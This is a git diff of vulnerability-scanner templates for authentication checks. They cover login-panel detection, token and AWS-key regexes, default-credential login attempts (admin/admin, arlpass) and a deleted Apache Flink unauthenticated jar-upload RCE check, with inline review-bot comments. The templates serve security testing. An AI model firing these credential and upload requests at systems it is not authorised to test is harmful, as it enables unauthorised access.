gaurang severity: medium - description: Amazon MWS authentication token was detected. - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N - cvss-score: 5.3 - cwe-id: CWE-200 tags: token,file,amazon,auth + file: - extensions: - all @@ -18,6 +14,3 @@ file: - type: regex regex: - "amzn\\.mws\\.[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}" - -# Enhanced by md on 2023/05/04 -# digest: 4a0a00473045022100a22e9ab4357449ff0b0d0e1d56fd2a2a815900eb260c13cdc8ca5b4904508d76022030e701c98fff70a3c0e8174fe27c30c87c60b0a4acdc97555a71970ab6e5e83a:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/amazon-mws-auth-token-282.yaml b/poc/auth/amazon-mws-auth-token-282.yaml index eb41de1dae..457df905b0 100644 --- a/poc/auth/amazon-mws-auth-token-282.yaml +++ b/poc/auth/amazon-mws-auth-token-282.yaml 
@@ -4,9 +4,11 @@ info: name: Amazon MWS Auth Token author: puzzlepeaches severity: info + metadata: + max-request: 1 tags: exposure,token,aws,amazon,auth -requests: +http: - method: GET path: - "{{BaseURL}}" @@ -16,3 +18,5 @@ requests: part: body regex: - "amzn\\.mws\\.[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}" + +# digest: 4a0a00473045022040ac741be24d02135b0308a6d074f2d03fe6a7f1417abf455cea9942aefc7a5c022100954436ed9253b63aeda894501173c9013bdb27a97305b3e03e74001b84c73fc7:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/amazon-mws-auth-token-283.yaml b/poc/auth/amazon-mws-auth-token-283.yaml index 457df905b0..28e8063f5e 100644 --- a/poc/auth/amazon-mws-auth-token-283.yaml +++ b/poc/auth/amazon-mws-auth-token-283.yaml @@ -1,22 +1,15 @@ id: amazon-mws-auth-token - info: name: Amazon MWS Auth Token author: puzzlepeaches severity: info - metadata: - max-request: 1 - tags: exposure,token,aws,amazon,auth - -http: + tags: exposure,token,aws +requests: - method: GET path: - "{{BaseURL}}" - extractors: - type: regex part: body regex: - "amzn\\.mws\\.[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}" - -# digest: 4a0a00473045022040ac741be24d02135b0308a6d074f2d03fe6a7f1417abf455cea9942aefc7a5c022100954436ed9253b63aeda894501173c9013bdb27a97305b3e03e74001b84c73fc7:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/ambari-default-login-287.yaml b/poc/auth/ambari-default-login-287.yaml deleted file mode 100644 index 7d9efa4734..0000000000 --- a/poc/auth/ambari-default-login-287.yaml +++ /dev/null 
@@ -1,35 +0,0 @@
-id: ambari-default-login
-
-info:
- name: Apache Ambari Default Login
- author: pdteam
- description: An Apache Ambari default admin login was discovered.
- severity: high
- reference:
- - https://ambari.apache.org/1.2.0/installing-hadoop-using-ambari/content/ambari-chap3-1.html
- classification:
- cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
- cvss-score: 8.3
- cwe-id: CWE-522
- tags: ambari,default-login,apache
-
-requests:
- - raw:
- - |
- GET /api/v1/users/admin?fields=*,privileges/PrivilegeInfo/cluster_name,privileges/PrivilegeInfo/permission_name HTTP/1.1
- Host: {{Hostname}}
- Authorization: Basic {{base64(username + ':' + password)}}
- payloads:
- username:
- - admin
- password:
- - admin
- attack: pitchfork
- matchers:
- - type: word
- words:
- - '"Users" : {'
- - 'AMBARI.'
- condition: and
-
-# Enhanced by mp on 2022/03/22
diff --git a/poc/auth/ambari-default-login-289.yaml b/poc/auth/ambari-default-login-289.yaml
new file mode 100644
index 0000000000..b23093118b
--- /dev/null
+++ b/poc/auth/ambari-default-login-289.yaml
@@ -0,0 +1,35 @@
+id: ambari-default-login
+
+info:
+ name: Apache Ambari Default Login
+ author: pdteam
+ severity: high
+ description: An Apache Ambari default admin login was discovered.
+ reference:
+ - https://ambari.apache.org/1.2.0/installing-hadoop-using-ambari/content/ambari-chap3-1.html
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
+ cvss-score: 8.3
+ cwe-id: CWE-522
+ tags: ambari,default-login,apache
+
+requests:
+ - raw:
+ - |
+ GET /api/v1/users/admin?fields=*,privileges/PrivilegeInfo/cluster_name,privileges/PrivilegeInfo/permission_name HTTP/1.1
+ Host: {{Hostname}}
+ Authorization: Basic {{base64(username + ':' + password)}}
+ payloads:
+ username:
+ - admin
+ password:
+ - admin
+ attack: pitchfork
+ matchers:
+ - type: word
+ words:
+ - '"Users" : {'
+ - 'AMBARI.'
+ condition: and
+
+# Enhanced by mp on 2022/03/22
diff --git a/poc/auth/ambari-default-login-290.yaml b/poc/auth/ambari-default-login-290.yaml index e251839b56..7d9efa4734 100644 --- a/poc/auth/ambari-default-login-290.yaml +++ b/poc/auth/ambari-default-login-290.yaml @@ -3,7 +3,14 @@ id: ambari-default-login info: name: Apache Ambari Default Login author: pdteam - severity: medium + description: An Apache Ambari default admin login was discovered. + severity: high + reference: + - https://ambari.apache.org/1.2.0/installing-hadoop-using-ambari/content/ambari-chap3-1.html + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 tags: ambari,default-login,apache requests: @@ -24,3 +31,5 @@ requests: - '"Users" : {' - 'AMBARI.' condition: and + +# Enhanced by mp on 2022/03/22 diff --git a/poc/auth/amcrest-login-297.yaml b/poc/auth/amcrest-login-297.yaml index 19837aca9a..7455bbce1f 100644 --- a/poc/auth/amcrest-login-297.yaml +++ b/poc/auth/amcrest-login-297.yaml @@ -3,12 +3,19 @@ id: amcrest-login info: name: Amcrest Login author: DhiyaneshDK + description: An Amcrest LDAP user login was discovered. severity: info - reference: https://www.exploit-db.com/ghdb/7273 + reference: + - https://www.exploit-db.com/ghdb/7273 metadata: shodan-query: html:"amcrest" google-dork: intext:"amcrest" "LDAP User" tags: panel,camera,amcrest + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cve-id: + cwe-id: CWE-200 requests: - method: GET @@ -26,3 +33,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/03/16 diff --git a/poc/auth/ametys-admin-login-300.yaml b/poc/auth/ametys-admin-login-300.yaml index 7a96ee1ada..532dd02cda 100644 --- a/poc/auth/ametys-admin-login-300.yaml +++ b/poc/auth/ametys-admin-login-300.yaml 
@@ -1,16 +1,10 @@ id: ametys-admin-login info: - name: Ametys Admin Login Panel + name: Ametys Admin Login author: pathtaga severity: info - description: An Ametys admin login panel was discovered. tags: panel,ametys,cms - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 - cve-id: - cwe-id: CWE-200 requests: - method: GET @@ -34,6 +28,4 @@ requests: part: body group: 1 regex: - - ' ([0-9.]+)' - -# Enhanced by mp on 2022/03/16 + - ' ([0-9.]+)' \ No newline at end of file diff --git a/poc/auth/ametys-admin-login-301.yaml b/poc/auth/ametys-admin-login-301.yaml deleted file mode 100644 index 532dd02cda..0000000000 --- a/poc/auth/ametys-admin-login-301.yaml +++ /dev/null @@ -1,31 +0,0 @@ -id: ametys-admin-login - -info: - name: Ametys Admin Login - author: pathtaga - severity: info - tags: panel,ametys,cms - -requests: - - method: GET - path: - - '{{BaseURL}}/_admin/index.html' - - matchers-condition: and - matchers: - - type: word - words: - - 'Ametys - Log in' - - '' - condition: or - - - type: status - status: - - 200 - - extractors: - - type: regex - part: body - group: 1 - regex: - - ' ([0-9.]+)' \ No newline at end of file diff --git a/poc/auth/ametys-admin-login-302.yaml b/poc/auth/ametys-admin-login-302.yaml new file mode 100644 index 0000000000..7f33273288 --- /dev/null +++ b/poc/auth/ametys-admin-login-302.yaml @@ -0,0 +1,36 @@ +id: ametys-admin-login + +info: + name: Ametys Admin Login Panel + author: pathtaga + severity: info + description: An Ametys admin login panel was discovered. + classification: + cwe-id: CWE-200 + tags: panel,ametys,cms + +requests: + - method: GET + path: + - '{{BaseURL}}/_admin/index.html' + + matchers-condition: and + matchers: + - type: word + words: + - 'Ametys - Log in' + - '' + condition: or + + - type: status + status: + - 200 + + extractors: + - type: regex + part: body + group: 1 + regex: + - ' ([0-9.]+)' + +# Enhanced by mp on 2022/03/16 
diff --git a/poc/auth/apache-flink-unauth-rce-355.yaml b/poc/auth/apache-flink-unauth-rce-355.yaml deleted file mode 100644 index dbae4dd542..0000000000 --- a/poc/auth/apache-flink-unauth-rce-355.yaml +++ /dev/null @@ -1,50 +0,0 @@ -id: apache-flink-unauth-rce - -info: - name: Apache Flink - Remote Code Execution - author: pikpikcu - severity: critical - description: Apache Flink - reference: Apache Flink contains an unauthenticated remote code execution vulnerability. - https://www.exploit-db.com/exploits/48978 - https://adamc95.medium.com/apache-flink-1-9-x-part-1-set-up-5d85fd2770f3 - https://github.com/LandGrey/flink-unauth-rce - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10 - cwe-id: CWE-77 - metadata: - max-request: 1 - tags: apache,flink,rce,intrusive,unauth - -http: - - raw: - - | - POST /jars/upload HTTP/1.1 - Host: {{Hostname}} - Content-Type: multipart/form-data;boundary=8ce4b16b22b58894aa86c421e8759df3 - - --8ce4b16b22b58894aa86c421e8759df3 - Content-Disposition: form-data; name="jarfile";filename="poc.jar" - Content-Type:application/octet-stream - - {{randstr}} - --8ce4b16b22b58894aa86c421e8759df3-- - - matchers-condition: and - matchers: - - type: word - words: - - "application/json" - part: header - condition: and - - - type: word - words: - - "success" - - "_poc.jar" - part: body - condition: and - - - type: status - status: - - 200 - -# digest: 4a0a00473045022100c23141a6f16f90c8fab66fa3b2c0a15f1a1e8764af83f977671389376049f79a02206e4a7c6f9fc1b8828421abed2d16188c020d5eb6277cfa5835a8d60a1314d352:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/apache-storm-unauth.yaml b/poc/auth/apache-storm-unauth.yaml index dc48849fe9..2a2c45e566 100644 --- a/poc/auth/apache-storm-unauth.yaml +++ b/poc/auth/apache-storm-unauth.yaml 
@@ -1,20 +1,14 @@ id: apache-storm-unauth - info: name: Apache Storm Unauth author: pikpikcu severity: medium - reference: - - https://storm.apache.org/releases/current/STORM-UI-REST-API.html - metadata: - max-request: 1 + reference: https://storm.apache.org/releases/current/STORM-UI-REST-API.html tags: apache,unauth,misconfig - -http: +requests: - method: GET path: - '{{BaseURL}}/api/v1/cluster/summary' - matchers-condition: and matchers: - type: word @@ -23,9 +17,6 @@ http: - '"totalMem":' - '"stormVersion":' condition: and - - type: status status: - 200 - -# digest: 490a0046304402206445294e1d237514858065f44d0ca332874876a4071b4163c436a74f803abb6c022066822b6f0d9f4fa25b39da6bec4db4aef6067a7a6d78391697a8022dc4131691:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/apc-ups-login.yaml b/poc/auth/apc-ups-login.yaml deleted file mode 100644 index f28e384f2c..0000000000 --- a/poc/auth/apc-ups-login.yaml +++ /dev/null @@ -1,24 +0,0 @@ -id: apc-ups-login - -info: - name: APC UPS Login - author: droberson - severity: info - reference: https://www.shodan.io/search?query=title%3A%22APC+%7C+Log+On%22 - tags: iot,panel - -requests: - - method: GET - path: - - "{{BaseURL}}/logon.htm" - - matchers-condition: and - matchers: - - type: word - words: - - 'APC | Log On' - part: body - - - type: status - status: - - 200 diff --git a/poc/auth/api-fortitoken-cloud.yaml b/poc/auth/api-fortitoken-cloud.yaml index 3a49a9a760..2e71549626 100644 --- a/poc/auth/api-fortitoken-cloud.yaml +++ b/poc/auth/api-fortitoken-cloud.yaml 
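Review bot: The second hunk of `apache-storm-unauth.yaml` removes the trailing `# digest:` line, and the first hunk switches `http:` back to `requests:` and drops `metadata.max-request`. If the scanner in use verifies template signatures, the file would presumably load as unsigned, and anyone auditing this collection loses the means to check that the template still matches what upstream signed. `requests:` is the older key name, so keeping `http:` together with the digest of the version actually shipped is the safer direction. The same reversal appears in `apollo-default-login-520.yaml` (which also goes back to `all_headers_2` and `cookie-reuse: true`), `arl-default-login-539.yaml`, `axiom-digitalocean-key-exposure-666.yaml`, `azkaban-default-login-674.yaml` and `brother-unauthorized-access.yaml`.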
@@ -3,15 +3,20 @@ id: api-fortitoken-cloud info: name: FortiToken Cloud API Test author: dwisiswant0 - reference: https://docs.fortinet.com/document/fortitoken-cloud/latest/rest-api/456035/overview severity: info + reference: + - https://docs.fortinet.com/document/fortitoken-cloud/latest/rest-api/456035/overview + metadata: + max-request: 1 tags: token-spray,fortinet self-contained: true -requests: + +http: - method: GET path: - "https://ftc.fortinet.com:9696/api/v1/user" + headers: Authorization: Bearer {{token}} @@ -26,3 +31,5 @@ requests: regex: - "error_(code|message|name)" negative: true + +# digest: 4b0a0048304602210085dec939ca5aa4774aa6f9061c9f5dd131840d9c20832e13ca23afa1257873f2022100b6641576a1409c2d37274fd46d42e9c46ff5e2e13486e63eddd92c1a1e5dba1d:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/api-mojoauth-466.yaml b/poc/auth/api-mojoauth-466.yaml deleted file mode 100644 index 85c9820f23..0000000000 --- a/poc/auth/api-mojoauth-466.yaml +++ /dev/null @@ -1,33 +0,0 @@ -id: api-mojoauth - -info: - name: MojoAuth API Test - author: daffainfo - severity: info - description: Secure and modern passwordless authentication platform - reference: - - https://mojoauth.com/docs/ - - https://github.com/daffainfo/all-about-apikey/tree/main/mojoauth - metadata: - max-request: 1 - tags: token-spray,mojoauth - -self-contained: true - -http: - - raw: - - | - POST https://api.mojoauth.com/token/jwks HTTP/1.1 - Host: api.mojoauth.com - X-API-Key: {{token}} - - matchers: - - type: word - part: body - words: - - '"keys"' - - '"kty"' - - '"kid"' - condition: and - -# digest: 4a0a0047304502200506d39f1578c027a21bc88f89e4c08aeb679ca01db946d0b2bfb56e7d8c615d022100b6123ee1887fe67d62e526c14ad9b4bd755d1727085a16877bbb8b59651f33ba:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/api-mojoauth.yaml b/poc/auth/api-mojoauth.yaml new file mode 100644 index 0000000000..db56c9a9bc --- /dev/null +++ b/poc/auth/api-mojoauth.yaml 
@@ -0,0 +1,28 @@ +id: api-mojoauth + +info: + name: MojoAuth API Test + author: daffainfo + severity: info + description: Secure and modern passwordless authentication platform + reference: + - https://mojoauth.com/docs/ + - https://github.com/daffainfo/all-about-apikey/tree/main/mojoauth + tags: token-spray,mojoauth + +self-contained: true +requests: + - raw: + - | + POST https://api.mojoauth.com/token/jwks HTTP/1.1 + Host: api.mojoauth.com + X-API-Key: {{token}} + + matchers: + - type: word + part: body + words: + - '"keys"' + - '"kty"' + - '"kid"' + condition: and diff --git a/poc/auth/apisix-default-login-492.yaml b/poc/auth/apisix-default-login-492.yaml index cb4e83e6df..c16b0c60b1 100644 --- a/poc/auth/apisix-default-login-492.yaml +++ b/poc/auth/apisix-default-login-492.yaml @@ -1,22 +1,13 @@ id: apisix-default-login - info: - name: Apache Apisix Default Admin Login + name: Apache Apisix Default Login author: pdteam - severity: high - description: An Apache Apisix default admin login was discovered. + severity: critical + tags: apisix,apache,default-login metadata: shodan-query: title:"Apache APISIX Dashboard" fofa-query: title="Apache APISIX Dashboard" product: https://apisix.apache.org - reference: - - https://apisix.apache.org/ - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L - cvss-score: 8.3 - cwe-id: CWE-522 - tags: apisix,apache,default-login - requests: - raw: - | @@ -27,25 +18,20 @@ requests: Content-Type: application/json;charset=UTF-8 {"username":"{{user}}","password":"{{pass}}"} - attack: pitchfork payloads: user: - admin pass: - admin - matchers-condition: and matchers: - type: status status: - 200 - - type: word words: - '"data"' - '"token"' - '"code":0' condition: and - -# Enhanced by mp on 2022/03/22 diff --git a/poc/auth/apollo-default-login-520.yaml b/poc/auth/apollo-default-login-520.yaml index 03709bd616..f671e7631e 100644 --- a/poc/auth/apollo-default-login-520.yaml 
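Review bot: The first hunk of `apisix-default-login-492.yaml` raises `severity` from `high` to `critical` while deleting `description`, `reference` and the `classification` block that held the CVSS vector and `cwe-id: CWE-522`. Nothing left in the file supports the new rating, and it disagrees with the other default-login templates in this patch, which stay at `high` with a score of 8.3. Either keep `severity: high` together with the classification block, or keep the block and update the vector so that it justifies `critical`. The second hunk also drops the `# Enhanced by` trailer and all blank lines, which makes the file harder to compare with its siblings.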
+++ b/poc/auth/apollo-default-login-520.yaml @@ -5,18 +5,17 @@ info: author: PaperPen severity: high description: An Apollo default login was discovered. + metadata: + shodan-query: http.favicon.hash:11794165 reference: - https://github.com/apolloconfig/apollo classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L cvss-score: 8.3 cwe-id: CWE-522 - metadata: - max-request: 2 - shodan-query: http.favicon.hash:11794165 tags: apollo,default-login -http: +requests: - raw: - | POST /signin HTTP/1.1 @@ -26,6 +25,7 @@ http: Referer: {{BaseURL}}/signin? username={{user}}&password={{pass}}&login-submit=Login + - | GET /user HTTP/1.1 Host: {{Hostname}} @@ -37,6 +37,8 @@ http: pass: - admin + cookie-reuse: true + req-condition: true matchers-condition: and matchers: - type: word @@ -49,7 +51,7 @@ http: - type: dsl dsl: - "status_code_1 == 302 && status_code_2 == 200" - - "contains(tolower(header_2), 'application/json')" + - "contains(tolower(all_headers_2), 'application/json')" condition: and -# digest: 4a0a004730450220546faaa98906288873457aaf445639368f32ddc0a459ae0362b9c87333a0832d022100a718e9fdccaa633152c35bd8f59d89e60a8a24f359521d6c6b0232fe8a07e196:922c64590222798bb761d5b6d8e72950 +# Enhanced by mp on 2022/03/22 diff --git a/poc/auth/apollo-default-login-521.yaml b/poc/auth/apollo-default-login.yaml similarity index 100% rename from poc/auth/apollo-default-login-521.yaml rename to poc/auth/apollo-default-login.yaml diff --git a/poc/auth/apple-app-site-association-524.yaml b/poc/auth/apple-app-site-association-524.yaml index 53fd428289..9954c8d681 100644 --- a/poc/auth/apple-app-site-association-524.yaml +++ b/poc/auth/apple-app-site-association-524.yaml @@ -4,7 +4,7 @@ info: name: Apple app site association for harvesting end points author: panch0r3d severity: info - tags: misc,apple + tags: misc requests: - method: GET 
@@ -17,17 +17,17 @@ requests: matchers-condition: and matchers: - type: word - part: body words: - 'applinks' - 'appID' - 'paths' + part: body condition: and - type: word - part: header words: - 'application/json' + part: header - type: status status: diff --git a/poc/auth/argocd-login-534.yaml b/poc/auth/argocd-login-534.yaml deleted file mode 100644 index 08c875c528..0000000000 --- a/poc/auth/argocd-login-534.yaml +++ /dev/null @@ -1,35 +0,0 @@ -id: argocd-detect - -info: - name: Argo CD Login Panel - author: Adam Crosser,daffainfo - severity: info - description: An Argo CD login panel was discovered. - reference: - - https://argoproj.github.io/cd/ - metadata: - shodan-query: http.title:"Argo CD" - tags: panel,argocd,login,kubernetes - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 - cve-id: - cwe-id: CWE-200 - -requests: - - method: GET - path: - - "{{BaseURL}}/login" - - matchers-condition: and - matchers: - - type: word - part: body - words: - - 'Argo CD' - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/03/20 diff --git a/poc/auth/argocd-login.yaml b/poc/auth/argocd-login-536.yaml similarity index 100% rename from poc/auth/argocd-login.yaml rename to poc/auth/argocd-login-536.yaml diff --git a/poc/auth/arl-default-login-537.yaml b/poc/auth/arl-default-login-537.yaml deleted file mode 100644 index bbadfab474..0000000000 --- a/poc/auth/arl-default-login-537.yaml +++ /dev/null 
@@ -1,44 +0,0 @@ -id: arl-default-login - -info: - name: ARL Default Admin Login - author: pikpikcu - description: An ARL default admin login was discovered. - severity: high - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L - cvss-score: 8.3 - cwe-id: CWE-522 - tags: arl,default-login - -requests: - - raw: - - | - POST /api/user/login HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/json; charset=UTF-8 - - {"username":"{{username}}","password":"{{password}}"} - - payloads: - username: - - admin - password: - - arlpass - attack: pitchfork - - matchers-condition: and - matchers: - - - type: word - condition: and - words: - - '"message": "success"' - - '"username": "admin"' - - '"type": "login"' - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/03/22 diff --git a/poc/auth/arl-default-login-539.yaml b/poc/auth/arl-default-login-539.yaml index ade9a66625..f5dcf2d27b 100644 --- a/poc/auth/arl-default-login-539.yaml +++ b/poc/auth/arl-default-login-539.yaml @@ -9,11 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L cvss-score: 8.3 cwe-id: CWE-522 - metadata: - max-request: 1 tags: arl,default-login -http: +requests: - raw: - | POST /api/user/login HTTP/1.1 @@ -31,6 +29,7 @@ http: matchers-condition: and matchers: + - type: word condition: and words: @@ -42,4 +41,4 @@ http: status: - 200 -# digest: 4b0a004830460221009e8ced2d45fa685ac85035c2df9d7b215cc33338c70461e061867c7523076a8202210099449ca19939bfbf2aab4959eb1a0e46cc404198adc98cc89c469d274794e0d6:922c64590222798bb761d5b6d8e72950 +# Enhanced by mp on 2022/03/22 diff --git a/poc/auth/arl-default-login-540.yaml b/poc/auth/arl-default-login-540.yaml index a7c16e40a9..bbadfab474 100644 --- a/poc/auth/arl-default-login-540.yaml +++ b/poc/auth/arl-default-login-540.yaml 
@@ -1,9 +1,14 @@ id: arl-default-login info: - name: ARL Default Login + name: ARL Default Admin Login author: pikpikcu + description: An ARL default admin login was discovered. severity: high + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 tags: arl,default-login requests: @@ -35,3 +40,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/03/22 diff --git a/poc/auth/arl-default-password.yaml b/poc/auth/arl-default-password.yaml index d1be4b04a1..08f426e7da 100644 --- a/poc/auth/arl-default-password.yaml +++ b/poc/auth/arl-default-password.yaml @@ -1,9 +1,11 @@ id: arl-default-password + info: name: ARL Default Password author: pikpikcu severity: high tags: arl,default-login + requests: - method: POST path: @@ -12,8 +14,10 @@ requests: Content-Type: application/json; charset=UTF-8 body: | {"username":"admin","password":"arlpass"} + matchers-condition: and matchers: + - type: word words: - '"message": "success"' diff --git a/poc/auth/atvise-login.yaml b/poc/auth/atvise-login.yaml deleted file mode 100644 index ebc1df47af..0000000000 --- a/poc/auth/atvise-login.yaml +++ /dev/null @@ -1,29 +0,0 @@ -id: atvise-login - -info: - name: Atvise Login panel - author: idealphase - severity: info - description: atvise is leading visualization and control center solutions based on pure web technology - reference: - - https://www.exploit-db.com/ghdb/7837 - - https://www.atvise.com/en - metadata: - google-dork: intitle:"atvise - next generation" - tags: panel,atvise - -requests: - - method: GET - path: - - '{{BaseURL}}' - - matchers-condition: and - matchers: - - type: word - part: body - words: - - 'atvise - next generation' - - - type: status - status: - - 200 diff --git a/poc/auth/authelia-panel.yaml b/poc/auth/authelia-panel.yaml new file mode 100644 index 0000000000..2ca8657997 --- /dev/null +++ b/poc/auth/authelia-panel.yaml 
@@ -0,0 +1,33 @@ +id: authelia-panel + +info: + name: Authelia Panel - Detect + author: rxerium + severity: info + description: | + Authelia is an open-source authentication and authorisation service providing two-factor authentication and single sign-on (SSO) for applications via a web portal. + reference: + - https://github.com/authelia/authelia + - https://www.authelia.com/ + metadata: + verified: true + max-request: 1 + shodan-query: title:"Login - Authelia" + tags: login,panel,authelia + +http: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + - type: word + words: + - "Login - Authelia" + + - type: status + status: + - 200 + +# digest: 490a004630440220490a5021967e030ff89ae16d4641c71e7eed70d1dd4ff6cd0f0194c789109b09022059bfbb46ae3a213be944bd8038a53d6fc66cd14351190788fbc8a035e9e6fbed:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/avatier-password-management-605.yaml b/poc/auth/avatier-password-management-605.yaml deleted file mode 100644 index 49cd4c37ae..0000000000 --- a/poc/auth/avatier-password-management-605.yaml +++ /dev/null @@ -1,37 +0,0 @@ -id: avatier-password-management - -info: - name: Avatier Password Management Panel - author: praetorian-thendrickson,iamthefrogy,dhiyaneshDK - severity: info - description: An Avatier password management panel was detected. - reference: - - https://www.exploit-db.com/ghdb/6576 - - https://www.avatier.com/products/identity-management/password-management/ - classification: - cwe-id: CWE-200 - metadata: - shodan-query: http.favicon.hash:983734701 - tags: panel,avatier,aims - -requests: - - method: GET - path: - - '{{BaseURL}}/aims/ps/' - - redirects: true - max-redirects: 2 - matchers-condition: or - matchers: - - type: word - words: - - 'LabelWelcomeToPS' - - 'Avatier Corporation' - - 'Welcome to Password Management' - condition: or - - - type: word - words: - - 'Password Management Client' - -# Enhanced by mp on 2022/03/20 
diff --git a/poc/auth/avatier-password-management.yaml b/poc/auth/avatier_password_management.yaml similarity index 100% rename from poc/auth/avatier-password-management.yaml rename to poc/auth/avatier_password_management.yaml diff --git a/poc/auth/aws-access-key-value-624.yaml b/poc/auth/aws-access-key-value-624.yaml new file mode 100644 index 0000000000..5cb8846e08 --- /dev/null +++ b/poc/auth/aws-access-key-value-624.yaml @@ -0,0 +1,22 @@ +id: aws-access-key-value + +info: + name: AWS Access Key ID Value + author: Swissky + severity: info + metadata: + max-request: 1 + tags: exposure,token,aws,amazon + +http: + - method: GET + path: + - "{{BaseURL}}" + + extractors: + - type: regex + part: body + regex: + - "\b(A3T[A-Z0-9]|AKIA|AGPA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16}\b" + +# digest: 4a0a004730450220593a92026bc21a26687f6e78f52259873c5643010bf2bf67aec0ad4e469ce40a022100bb56301e5df9b095b39838c76cc5cf37b469e84c9e488be380aa9f1dbfc3df00:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/aws-opensearch-login-649.yaml b/poc/auth/aws-opensearch-login-649.yaml new file mode 100644 index 0000000000..ffd32b7e76 --- /dev/null +++ b/poc/auth/aws-opensearch-login-649.yaml @@ -0,0 +1,24 @@ +id: aws-opensearch-login + +info: + name: AWS OpenSearch Default Login + author: Higor Melgaço (eremit4) + severity: medium + description: Searches for the AWS OpenSearch login page + reference: https://aws.amazon.com/pt/blogs/opensource/introducing-opensearch/ + tags: panel,opensearch,aws + +requests: + - method: GET + path: + - '{{BaseURL}}/_dashboards/app/login' + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "Please login to OpenSearch Dashboards" \ No newline at end of file diff --git a/poc/auth/aws-opensearch-login-650.yaml b/poc/auth/aws-opensearch-login-650.yaml deleted file mode 100644 index 14f111d73a..0000000000 --- a/poc/auth/aws-opensearch-login-650.yaml +++ /dev/null 
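Review bot: The extractor regex in the new `aws-access-key-value-624.yaml` is written as a double-quoted YAML scalar, where `\b` is the backspace escape and not a regex word boundary. As written, the pattern would require a literal backspace character on each side of the key id, so the extractor would be expected never to fire. Single quotes keep the backslashes intact: `- '\b(A3T[A-Z0-9]|AKIA|AGPA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16}\b'`. The template has no matcher, so this extractor is the only thing that produces a result.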
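Review bot: `aws-opensearch-login-649.yaml` is named `AWS OpenSearch Default Login` with `severity: medium`, but the request only fetches `/_dashboards/app/login` and matches the login prompt text; no credentials are sent. That makes it a panel detection (it is tagged `panel`), and a medium finding for a reachable login page distorts triage. Suggest `name: AWS OpenSearch Login Panel` and `severity: info`. `reference:` should also be written as a list, as the later hunk for `aws-opensearch-login.yaml` in this patch does.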
@@ -1,25 +0,0 @@ -id: aws-opensearch-login - -info: - name: AWS OpenSearch Default Login - author: Higor Melgaço (eremit4) - severity: medium - description: Searches for the AWS OpenSearch login page - reference: - - https://aws.amazon.com/pt/blogs/opensource/introducing-opensearch/ - tags: panel,opensearch,aws - -requests: - - method: GET - path: - - '{{BaseURL}}/_dashboards/app/login' - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: word - words: - - "Please login to OpenSearch Dashboards" \ No newline at end of file diff --git a/poc/auth/aws-opensearch-login.yaml b/poc/auth/aws-opensearch-login.yaml index ffd32b7e76..14f111d73a 100644 --- a/poc/auth/aws-opensearch-login.yaml +++ b/poc/auth/aws-opensearch-login.yaml @@ -5,7 +5,8 @@ info: author: Higor Melgaço (eremit4) severity: medium description: Searches for the AWS OpenSearch login page - reference: https://aws.amazon.com/pt/blogs/opensource/introducing-opensearch/ + reference: + - https://aws.amazon.com/pt/blogs/opensource/introducing-opensearch/ tags: panel,opensearch,aws requests: diff --git a/poc/auth/axiom-digitalocean-key-exposure-666.yaml b/poc/auth/axiom-digitalocean-key-exposure-666.yaml index 2f41c1bfe2..589c0b408e 100644 --- a/poc/auth/axiom-digitalocean-key-exposure-666.yaml +++ b/poc/auth/axiom-digitalocean-key-exposure-666.yaml 
